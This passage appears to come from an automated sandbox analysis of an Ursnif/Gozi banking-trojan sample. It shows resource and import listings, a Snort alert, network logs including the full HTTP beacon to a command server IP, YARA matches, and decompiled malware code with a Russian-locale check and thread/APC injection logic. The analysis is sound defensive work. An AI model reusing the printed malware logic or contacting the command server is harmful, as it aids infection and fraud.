                  RT_ICON0xa77280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
                  RT_ICON0xa77280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
                  RT_ICON0xa77280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
                  RT_ICON0xa7df00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
                  RT_ICON0xa7df00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
                  RT_ICON0xa7df00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
                  RT_ICON0xa83580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
                  RT_ICON0xa83580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
                  RT_ICON0xa83580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
                  RT_ICON0xaa9000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
                  RT_ICON0xaa9000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
                  RT_ICON0xaa9000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
                  RT_ICON0xab9a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
                  RT_ICON0xab9a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
                  RT_ICON0xab9a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
                  RT_ICON0xac3300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
                  RT_ICON0xac3300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
                  RT_ICON0xac3300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
                  RT_STRING0xadfe00x3bedataSami LappishFinland
                  RT_STRING0xadfe00x3bedataSami LappishNorway
                  RT_STRING0xadfe00x3bedataSami LappishSweden
                  RT_STRING0xae3a00x36adataSami LappishFinland
                  RT_STRING0xae3a00x36adataSami LappishNorway
                  RT_STRING0xae3a00x36adataSami LappishSweden
                  RT_ACCELERATOR0xac8a80x90dataSami LappishFinland
                  RT_ACCELERATOR0xac8a80x90dataSami LappishNorway
                  RT_ACCELERATOR0xac8a80x90dataSami LappishSweden
                  RT_ACCELERATOR0xac8000xa8dataSami LappishFinland
                  RT_ACCELERATOR0xac8000xa8dataSami LappishNorway
                  RT_ACCELERATOR0xac8000xa8dataSami LappishSweden
                  RT_GROUP_CURSOR0xaca780x14data
                  RT_GROUP_CURSOR0xadd580x30data
                  RT_GROUP_ICON0xa00200x22dataSami LappishFinland
                  RT_GROUP_ICON0xa00200x22dataSami LappishNorway
                  RT_GROUP_ICON0xa00200x22dataSami LappishSweden
                  RT_GROUP_ICON0xa68080x76dataSami LappishFinland
                  RT_GROUP_ICON0xa68080x76dataSami LappishNorway
                  RT_GROUP_ICON0xa68080x76dataSami LappishSweden
                  RT_GROUP_ICON0xac7980x68dataSami LappishFinland
                  RT_GROUP_ICON0xac7980x68dataSami LappishNorway
                  RT_GROUP_ICON0xac7980x68dataSami LappishSweden
                  RT_VERSION0xadd880x254data
                  None0xac9380xadataSami LappishFinland
                  None0xac9380xadataSami LappishNorway
                  None0xac9380xadataSami LappishSweden
                  DLLImport
                  KERNEL32.dlllstrcmpA, FindFirstFileW, EnumCalendarInfoA, _llseek, WritePrivateProfileSectionA, GlobalLock, InterlockedCompareExchange, SleepEx, GetModuleHandleW, EnumCalendarInfoExW, EnumTimeFormatsW, WriteFileGather, EnumResourceTypesA, GlobalAlloc, GetSystemDirectoryW, AddRefActCtx, GetSystemWindowsDirectoryA, LeaveCriticalSection, GetConsoleAliasW, GetFileAttributesW, SetDefaultCommConfigA, GetCPInfoExW, SetLastError, GetProcAddress, CopyFileA, GetFirmwareEnvironmentVariableW, LoadLibraryA, OpenWaitableTimerW, FindFirstVolumeMountPointW, GetExitCodeThread, AddAtomW, CreateEventW, AddAtomA, FindNextFileW, GetShortPathNameW, SetCalendarInfoA, ReadConsoleInputW, LocalSize, CopyFileExA, RaiseException, PulseEvent, GetLastError, MoveFileA, DeleteFileA, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, HeapAlloc, EnterCriticalSection, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapCreate, HeapFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, LoadLibraryW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, MultiByteToWideChar, GetStringTypeW, SetFilePointer, IsProcessorFeaturePresent, HeapSize, CloseHandle, WriteConsoleW, SetStdHandle, CreateFileW
                  USER32.dllLoadMenuW
                  ADVAPI32.dllLookupAccountSidW
                  Language of compilation systemCountry where language is spokenMap
                  Sami LappishFinland
                  Sami LappishNorway
                  Sami LappishSweden
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.562.173.142.5149680802033203 03/14/23-16:02:33.550566TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4968080192.168.2.562.173.142.51
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 14, 2023 16:02:33.490955114 CET4968080192.168.2.562.173.142.51
                  Mar 14, 2023 16:02:33.550028086 CET804968062.173.142.51192.168.2.5
                  Mar 14, 2023 16:02:33.550132990 CET4968080192.168.2.562.173.142.51
                  Mar 14, 2023 16:02:33.550565958 CET4968080192.168.2.562.173.142.51
                  Mar 14, 2023 16:02:33.609353065 CET804968062.173.142.51192.168.2.5
                  Mar 14, 2023 16:02:33.609383106 CET804968062.173.142.51192.168.2.5
                  Mar 14, 2023 16:02:33.609524965 CET4968080192.168.2.562.173.142.51
                  Mar 14, 2023 16:02:33.612766027 CET4968080192.168.2.562.173.142.51
                  Mar 14, 2023 16:02:33.671506882 CET804968062.173.142.51192.168.2.5
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 14, 2023 16:01:13.337074041 CET6132553192.168.2.58.8.8.8
                  Mar 14, 2023 16:01:13.363226891 CET53613258.8.8.8192.168.2.5
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 14, 2023 16:01:13.337074041 CET192.168.2.58.8.8.80xce38Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 14, 2023 16:01:13.363226891 CET8.8.8.8192.168.2.50xce38Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
                  • 62.173.142.51
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.54968062.173.142.5180C:\Users\user\Desktop\server.exe
                  TimestampkBytes transferredDirectionData
                  Mar 14, 2023 16:02:33.550565958 CET3OUTGET /drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: 62.173.142.51
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Click to jump to process

                  Click to jump to process

                  Target ID:0
                  Start time:16:00:49
                  Start date:14/03/2023
                  Path:C:\Users\user\Desktop\server.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\server.exe
                  Imagebase:0x400000
                  File size:192000 bytes
                  MD5 hash:8F092511C91BFC1F2516E420739A7967
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.580553464.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation:low

                  Reset < >

                    Execution Graph

                    Execution Coverage:21.6%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:32.1%
                    Total number of Nodes:249
                    Total number of Limit Nodes:14
                    execution_graph 1187 401de1 HeapCreate 1188 401dfa GetModuleHandleA GetCommandLineW 1187->1188 1189 401e1f ExitProcess 1187->1189 1192 4019f1 1188->1192 1224 401d68 CreateEventA 1192->1224 1194 401ba4 HeapDestroy 1194->1189 1196 401a1e NtQuerySystemInformation 1197 4019fc 1196->1197 1197->1194 1197->1196 1231 4012e6 RtlAllocateHeap 1197->1231 1232 401688 1197->1232 1252 401ba9 RtlFreeHeap 1197->1252 1201 401a7b 1201->1194 1202 401a85 GetLocaleInfoA 1201->1202 1203 401ab7 1202->1203 1204 401a9f GetSystemDefaultUILanguage VerLanguageNameA 1202->1204 1205 401b96 1203->1205 1238 401800 1203->1238 1204->1203 1205->1194 1207 401b9e GetLastError 1205->1207 1207->1194 1209 401ad3 GetLongPathNameW 1210 401b05 CreateThread 1209->1210 1212 401ae7 1209->1212 1213 401b33 QueueUserAPC 1210->1213 1214 401b8d GetLastError 1210->1214 1250 4012e6 RtlAllocateHeap 1212->1250 1216 401b69 1213->1216 1217 401b4d GetLastError TerminateThread CloseHandle SetLastError 1213->1217 1214->1205 1216->1214 1219 401b6d WaitForSingleObject 1216->1219 1217->1216 1218 401af1 1218->1210 1220 401afa GetLongPathNameW 1218->1220 1221 401b88 CloseHandle 1219->1221 1222 401b7d GetExitCodeThread 1219->1222 1251 401ba9 RtlFreeHeap 1220->1251 1221->1205 1222->1221 1225 401d86 GetVersion 1224->1225 1226 401dda GetLastError 1224->1226 1227 401d90 1225->1227 1228 401d9d GetCurrentProcessId OpenProcess 1227->1228 1229 401dd5 1227->1229 1230 401dca 1228->1230 1229->1197 1230->1197 1231->1197 1233 4016af 1232->1233 1234 4017ed Sleep 1233->1234 1253 4012e6 RtlAllocateHeap 1233->1253 1234->1197 1234->1201 1236 40171e 1236->1234 1254 401ba9 RtlFreeHeap 1236->1254 1255 4012e6 RtlAllocateHeap 1238->1255 1240 40181e 1241 401824 GetModuleFileNameW 1240->1241 1242 401877 1240->1242 1243 401855 1241->1243 1244 401836 1241->1244 1242->1209 1242->1210 1243->1242 1245 401867 GetLastError 1243->1245 1248 401860 1243->1248 1244->1241 1244->1243 1256 401ba9 RtlFreeHeap 1244->1256 1257 4012e6 RtlAllocateHeap 1244->1257 1258 401ba9 RtlFreeHeap 1245->1258 1248->1242 1250->1218 1251->1210 1252->1197 1253->1236 1254->1234 1255->1240 1256->1244 1257->1244 1258->1248 1355 540005 1371 54092b GetPEB 1355->1371 1357 540030 1373 54003c 1357->1373 1372 540972 1371->1372 1372->1357 1374 540049 1373->1374 1375 540e0f 2 API calls 1374->1375 1376 540223 1375->1376 1377 540d90 GetPEB 1376->1377 1378 540238 VirtualAlloc 1377->1378 1379 540265 1378->1379 1380 5402ce VirtualProtect 1379->1380 1382 54030b 1380->1382 1381 540439 VirtualFree 1385 5404be LoadLibraryA 1381->1385 1382->1381 1384 5408c7 1385->1384 1386 541606 1387 54161f 1386->1387 1396 541ae9 1387->1396 1389 541658 1390 5416b3 RtlExitUserThread 1389->1390 1391 54165c lstrlenW 1389->1391 1401 541817 GetSystemTimeAsFileTime 1391->1401 1395 54167f 1410 541562 1395->1410 1399 541b4a 1396->1399 1398 541bf5 1398->1389 1399->1398 1421 54154d RtlAllocateHeap 1399->1421 1422 541e10 HeapFree 1399->1422 1402 54183f 1401->1402 1403 541875 CreateFileMappingW 1402->1403 1404 541890 1403->1404 1405 5418d8 GetLastError 1403->1405 1406 5418a9 MapViewOfFile 1404->1406 1408 5418a4 1404->1408 1407 5418b9 1405->1407 1406->1407 1406->1408 1407->1395 1408->1407 1409 5418cf CloseHandle 1408->1409 1409->1407 1423 541469 1410->1423 1412 5415fa 1412->1390 1413 54159e 1413->1412 1414 5415e8 1413->1414 1430 541267 1413->1430 1439 541e10 HeapFree 1414->1439 1420 5415e0 GetLastError 1420->1414 1421->1399 1422->1399 1440 54154d RtlAllocateHeap 1423->1440 1425 541477 1426 541481 GetModuleHandleA 1425->1426 1428 54152d 1425->1428 1429 5414b1 1426->1429 1428->1413 1429->1428 1441 541e10 HeapFree 1429->1441 1431 54135e 1430->1431 1433 54128a 1430->1433 1431->1414 1435 541736 1431->1435 1432 54129b LoadLibraryA 1432->1431 1432->1433 1433->1431 1433->1432 1434 54130d GetProcAddress 1433->1434 1434->1433 1437 541771 1435->1437 1436 5415cb 1436->1414 1436->1420 1437->1436 1438 5417ea GetLastError 1437->1438 1438->1437 1439->1412 1440->1425 1441->1428 1442 540001 1443 540005 1442->1443 1444 54092b GetPEB 1443->1444 1445 540030 1444->1445 1446 54003c 7 API calls 1445->1446 1447 540038 1446->1447 1448 540e0f 2 API calls 1447->1448 1449 540223 1448->1449 1450 540d90 GetPEB 1449->1450 1451 540238 VirtualAlloc 1450->1451 1452 540265 1451->1452 1453 5402ce VirtualProtect 1452->1453 1454 54030b 1453->1454 1455 540439 VirtualFree 1454->1455 1458 5404be LoadLibraryA 1455->1458 1457 5408c7 1458->1457 1259 54003c 1260 540049 1259->1260 1272 540e0f SetErrorMode SetErrorMode 1260->1272 1265 540265 1266 5402ce VirtualProtect 1265->1266 1268 54030b 1266->1268 1267 540439 VirtualFree 1271 5404be LoadLibraryA 1267->1271 1268->1267 1270 5408c7 1271->1270 1273 540223 1272->1273 1274 540d90 1273->1274 1275 540dad 1274->1275 1276 540dbb GetPEB 1275->1276 1277 540238 VirtualAlloc 1275->1277 1276->1277 1277->1265 1459 542048 HeapCreate 1460 542086 ExitProcess 1459->1460 1461 542061 GetModuleHandleA GetCommandLineW 1459->1461 1464 541c58 1461->1464 1493 541fcf CreateEventA 1464->1493 1466 541e0b HeapDestroy 1466->1460 1468 541c85 NtQuerySystemInformation 1469 541c63 1468->1469 1469->1466 1469->1468 1500 54154d RtlAllocateHeap 1469->1500 1501 541e10 HeapFree 1469->1501 1502 5418ef 1469->1502 1473 541ce2 1473->1466 1474 541cec GetLocaleInfoA 1473->1474 1475 541d06 GetSystemDefaultUILanguage VerLanguageNameA 1474->1475 1476 541d1e 1474->1476 1475->1476 1489 541def 1476->1489 1508 541a67 1476->1508 1477 541e05 GetLastError 1477->1466 1479 541d6c CreateThread 1482 541df4 GetLastError 1479->1482 1483 541d9a QueueUserAPC 1479->1483 1482->1489 1484 541db4 GetLastError TerminateThread 1483->1484 1485 541dd0 1483->1485 1491 541dc7 SetLastError 1484->1491 1485->1482 1487 541dd4 WaitForSingleObject 1485->1487 1488 541de4 GetExitCodeThread 1487->1488 1487->1489 1488->1489 1489->1466 1489->1477 1490 541d58 1490->1479 1519 541e10 HeapFree 1490->1519 1491->1485 1494 542041 GetLastError 1493->1494 1495 541fed GetVersion 1493->1495 1496 541ff7 1495->1496 1497 542004 GetCurrentProcessId OpenProcess 1496->1497 1498 54203c 1496->1498 1499 542031 1497->1499 1498->1469 1499->1469 1500->1469 1501->1469 1503 541916 1502->1503 1504 541a54 Sleep 1503->1504 1520 54154d RtlAllocateHeap 1503->1520 1504->1469 1504->1473 1506 541985 1506->1504 1521 541e10 HeapFree 1506->1521 1522 54154d RtlAllocateHeap 1508->1522 1510 541a85 1511 541a8b GetModuleFileNameW 1510->1511 1512 541abc 1510->1512 1517 541ac7 1510->1517 1523 541e10 HeapFree 1510->1523 1524 54154d RtlAllocateHeap 1510->1524 1511->1510 1511->1512 1514 541ace GetLastError 1512->1514 1512->1517 1525 541e10 HeapFree 1514->1525 1517->1479 1518 54154d RtlAllocateHeap 1517->1518 1518->1490 1519->1479 1520->1506 1521->1504 1522->1510 1523->1510 1524->1510 1525->1517 1278 40139f 1279 4013b8 1278->1279 1290 401d3c ConvertStringSecurityDescriptorToSecurityDescriptorA 1279->1290 1281 4013cc 1291 401882 1281->1291 1283 4013f1 1284 4013f5 lstrlenW 1283->1284 1289 40144c ExitThread 1283->1289 1296 4015b0 GetSystemTimeAsFileTime 1284->1296 1287 401418 1307 4012fb 1287->1307 1290->1281 1294 4018e3 1291->1294 1293 40198e 1293->1283 1294->1293 1318 4012e6 RtlAllocateHeap 1294->1318 1319 401ba9 RtlFreeHeap 1294->1319 1297 4015d8 CreateFileMappingW 1296->1297 1299 401671 GetLastError 1297->1299 1300 401629 1297->1300 1303 401652 1299->1303 1301 401642 MapViewOfFile 1300->1301 1302 401634 GetLastError 1300->1302 1301->1303 1305 401660 GetLastError 1301->1305 1302->1301 1304 40163d 1302->1304 1303->1287 1306 401668 CloseHandle 1304->1306 1305->1303 1305->1306 1306->1303 1320 401202 1307->1320 1309 401393 1309->1289 1310 401337 1310->1309 1311 401381 1310->1311 1333 401000 1310->1333 1344 401ba9 RtlFreeHeap 1311->1344 1317 401379 GetLastError 1317->1311 1318->1294 1319->1294 1345 4012e6 RtlAllocateHeap 1320->1345 1322 401210 1323 40121a GetModuleHandleA GetProcAddress 1322->1323 1332 4012c6 1322->1332 1324 401251 GetProcAddress 1323->1324 1331 4012bf 1323->1331 1326 401267 GetProcAddress 1324->1326 1324->1331 1327 40127d GetProcAddress 1326->1327 1326->1331 1328 401293 GetProcAddress 1327->1328 1327->1331 1329 4012a9 1328->1329 1328->1331 1346 40110b NtCreateSection 1329->1346 1331->1332 1352 401ba9 RtlFreeHeap 1331->1352 1332->1310 1334 4010f7 1333->1334 1336 401023 1333->1336 1334->1311 1339 4014cf VirtualProtect 1334->1339 1335 401034 LoadLibraryA 1335->1334 1335->1336 1336->1334 1336->1335 1338 40109d 1336->1338 1337 4010a6 GetProcAddress 1337->1338 1338->1336 1338->1337 1340 401364 1339->1340 1341 401518 1339->1341 1340->1311 1340->1317 1341->1340 1342 40156e VirtualProtect 1341->1342 1342->1341 1343 401583 GetLastError 1342->1343 1343->1341 1344->1309 1345->1322 1347 40119c 1346->1347 1348 40116f 1346->1348 1347->1331 1353 401459 NtMapViewOfSection 1348->1353 1351 401183 memset 1351->1347 1352->1332 1354 40117d 1353->1354 1354->1347 1354->1351

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00542ED4 1 Function_00401BC4 3 Function_00401C49 1->3 2 Function_00542CD3 4 Function_004030CA 5 Function_00541C58 8 Function_0054154D 5->8 12 Function_00541FCF 5->12 23 Function_00541A67 5->23 26 Function_005418EF 5->26 37 Function_00541E10 5->37 6 Function_004014CF 7 Function_005416C0 9 Function_0054224D 10 Function_00401459 11 Function_00540CCE 13 Function_00542048 13->5 14 Function_00401DE1 20 Function_004019F1 14->20 15 Function_00542C70 16 Function_00541372 16->7 17 Function_004012E6 18 Function_00540D7C 19 Function_00401D68 20->17 20->19 33 Function_00401800 20->33 39 Function_00401688 20->39 60 Function_00401BA9 20->60 21 Function_00540CE7 22 Function_00541267 23->8 23->37 24 Function_00541562 24->22 30 Function_00541469 24->30 24->37 54 Function_00541736 24->54 72 Function_00541E2B 24->72 25 Function_00542E63 26->8 26->9 26->37 27 Function_0054246F 28 Function_004012FB 28->1 28->6 32 Function_00401000 28->32 34 Function_00401202 28->34 28->60 29 Function_00541AE9 29->8 29->9 29->37 49 Function_0054208E 29->49 30->8 30->16 30->37 31 Function_00540A69 33->17 33->60 34->17 40 Function_0040110B 34->40 34->60 35 Function_00401882 35->17 58 Function_00401E27 35->58 35->60 36 Function_00541817 38 Function_00540D90 39->17 39->60 40->10 41 Function_0054141A 42 Function_00540005 42->11 42->21 42->31 42->38 50 Function_00540E0F 42->50 59 Function_0054003C 42->59 71 Function_0054092B 42->71 43 Function_00541606 43->9 43->24 43->29 43->36 67 Function_00541FA3 43->67 44 Function_00540001 44->11 44->21 44->31 44->38 44->50 44->59 44->71 45 Function_00542C81 46 Function_00541702 47 Function_00540D0C 48 Function_0054208D 49->41 49->46 51 Function_0040149B 52 Function_0040139F 52->28 52->35 64 Function_004015B0 52->64 69 Function_00401D3C 52->69 53 Function_00540D35 53->18 55 Function_00541EB0 56 Function_00542D31 57 Function_00401E26 58->51 65 Function_004011B3 58->65 59->11 59->21 59->31 59->38 59->50 61 Function_00540A3F 59->61 62 Function_0054253F 63 Function_00542EB8 66 Function_00540920 68 Function_005432AD 70 Function_00542CA9 71->47 71->53 72->9 72->55

                    Control-flow Graph

                    C-Code - Quality: 85%
                    			E004019F1() {
                    				long _v8;
                    				char _v12;
                    				char _v16;
                    				void* _v40;
                    				long _t28;
                    				long _t30;
                    				long _t31;
                    				signed short _t33;
                    				void* _t37;
                    				long _t40;
                    				long _t41;
                    				void* _t48;
                    				intOrPtr _t50;
                    				signed int _t57;
                    				signed int _t58;
                    				long _t63;
                    				long _t65;
                    				intOrPtr _t66;
                    				void* _t71;
                    				void* _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				void* _t82;
                    				intOrPtr* _t83;
                    
                    				_t28 = E00401D68();
                    				_v8 = _t28;
                    				if(_t28 != 0) {
                    					return _t28;
                    				}
                    				do {
                    					_t77 = 0;
                    					_v12 = 0;
                    					_t63 = 0x30;
                    					do {
                    						_t71 = E004012E6(_t63);
                    						if(_t71 == 0) {
                    							_v8 = 8;
                    						} else {
                    							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
                    							_t67 = _t57;
                    							_t58 = _t57 & 0x0000ffff;
                    							_v8 = _t58;
                    							if(_t58 == 4) {
                    								_t63 = _t63 + 0x30;
                    							}
                    							_t78 = 0x13;
                    							_t10 = _t67 + 1; // 0x1
                    							_t77 =  *_t71 % _t78 + _t10;
                    							E00401BA9(_t71);
                    						}
                    					} while (_v8 != 0);
                    					_t30 = E00401688(_t77); // executed
                    					_v8 = _t30;
                    					Sleep(_t77 << 4); // executed
                    					_t31 = _v8;
                    				} while (_t31 == 0x15);
                    				if(_t31 != 0) {
                    					L30:
                    					return _t31;
                    				}
                    				_v12 = 0;
                    				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
                    				if(_t33 == 0) {
                    					__imp__GetSystemDefaultUILanguage();
                    					_t67 =  &_v12;
                    					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                    				}
                    				if(_v12 == 0x5552) {
                    					L28:
                    					_t31 = _v8;
                    					if(_t31 == 0xffffffff) {
                    						_t31 = GetLastError();
                    					}
                    					goto L30;
                    				} else {
                    					if(E00401800(_t67,  &_v16) != 0) {
                    						 *0x404178 = 0;
                    						L20:
                    						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
                    						_t82 = _t37;
                    						if(_t82 == 0) {
                    							L27:
                    							_v8 = GetLastError();
                    							goto L28;
                    						}
                    						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
                    						if(_t40 == 0) {
                    							_t65 = GetLastError();
                    							TerminateThread(_t82, _t65);
                    							CloseHandle(_t82);
                    							_t82 = 0;
                    							SetLastError(_t65);
                    						}
                    						if(_t82 == 0) {
                    							goto L27;
                    						} else {
                    							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                    							_v8 = _t41;
                    							if(_t41 == 0) {
                    								GetExitCodeThread(_t82,  &_v8);
                    							}
                    							CloseHandle(_t82);
                    							goto L28;
                    						}
                    					}
                    					_t66 = _v16;
                    					_t83 = __imp__GetLongPathNameW;
                    					_t48 =  *_t83(_t66, 0, 0); // executed
                    					_t75 = _t48;
                    					if(_t75 == 0) {
                    						L18:
                    						 *0x404178 = _t66;
                    						goto L20;
                    					}
                    					_t22 = _t75 + 2; // 0x2
                    					_t50 = E004012E6(_t75 + _t22);
                    					 *0x404178 = _t50;
                    					if(_t50 == 0) {
                    						goto L18;
                    					}
                    					 *_t83(_t66, _t50, _t75); // executed
                    					E00401BA9(_t66);
                    					goto L20;
                    				}
                    			}



























                    0x004019f7
                    0x004019fc
                    0x00401a01
                    0x00401ba8
                    0x00401ba8
                    0x00401a0a
                    0x00401a0a
                    0x00401a0e
                    0x00401a11
